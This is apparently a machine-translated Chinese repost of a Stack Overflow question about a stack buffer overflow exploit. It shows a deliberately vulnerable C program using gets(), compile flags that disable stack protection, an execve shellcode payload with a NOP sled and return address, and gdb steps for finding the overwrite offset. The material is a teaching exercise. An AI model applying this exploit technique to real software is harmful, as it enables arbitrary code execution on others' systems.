[英]Unable to run stack buffer overflow exploit
我必須在以下緩沖區溢出程序中注入代碼。 該代碼應顯示主機名。 我有一個操作碼( \\x31\\xc0\\x50\\x68\\x6e\\x61\\x6d\\x65\\x68\\x68\\x6f\\x73\\x74\\x68\\x62\\x69\\x6e\\x2f\\x68\\x2f\\x2f\\x2f\\x2f\\x89\\xe3\\x50\\x54\\x53\\xb0\\x0b\\x50\\xcd\\x80
)起作用。 我已經使用過NOP和重復的返回地址。 但是我無法使用它來運行代碼,並且總是會遇到分段錯誤。 誰可以幫我這個事?
脆弱的
#include <stdio.h>
#include <stdlib.h>
int
main(int argc, char * * argv)
{
char * stuff = 0;
int len = 0;
vulnerable();
return 0;
}
int
vulnerable(void)
{
char buf[100];
printf("enter your name: ");
fflush(stdout);
gets(buf);
printf("\"%s\"\n Welcome", buf );
}
我用上面的程序編譯了
gcc -ggdb -mpreferred-stack-boundary=2 -fno-stack-protector -z execstack -o vulnerable vulnerable.c
Shellcode.py
print "\x90"*51 +"\x31\xc0\x50\x68\x6e\x61\x6d\x65\x68\x68\x6f\x73\x74\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x54\x53\xb0\x0b\x50\xcd\x80" + "\xd8\xf3\xff\xbf"*6
我已經在命令行中通過以下方式調用了該python程序
python shellcode.py | ./vulnerable
我建議您打開核心轉儲:
ulimit -c unlimited
然后做一個簡單的緩沖區溢出,如perl -e 'print "A"x130'
,系統將生成轉儲:使用gdb -c core
打開它,您將看到%eip = 0x41414141
然后,您可以減少注入的緩沖區,就像perl -e 'print "A"x120'
直到獲得確切的緩沖區大小以覆蓋RET。
您能描述查找寄信人地址的步驟嗎?
c> shellcode.py >shellcode
c> gdb vulnerable
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu"...
(gdb) b vulnerable
Breakpoint 1 at 0x80484e6: file vulnerable.c, line 17.
(gdb) r <shellcode
Starting program: /home/armali/bin/so/c/vulnerable <shellcode
Breakpoint 1, vulnerable () at vulnerable.c:17
17 printf("enter your name: ");
(gdb) info frame
Stack level 0, frame at 0xbffff7bc:
eip = 0x80484e6 in vulnerable (vulnerable.c:17); saved eip 0x80484c9
called by frame at 0xbffff7cc
source language c.
Arglist at 0xbffff7bc, args:
Locals at 0xbffff7bc, Previous frame's sp is 0x0
Saved registers:
ebp at 0xbffff7bc, eip at 0xbffff7c0
該示例顯示返回地址eip 0x80484c9
保存at 0xbffff7c0
。
聲明:本站的技術帖子網頁,遵循CC BY-SA 4.0協議,如果您需要轉載,請注明本站網址或者原文地址。任何問題請咨詢:yoyou2525@163.com.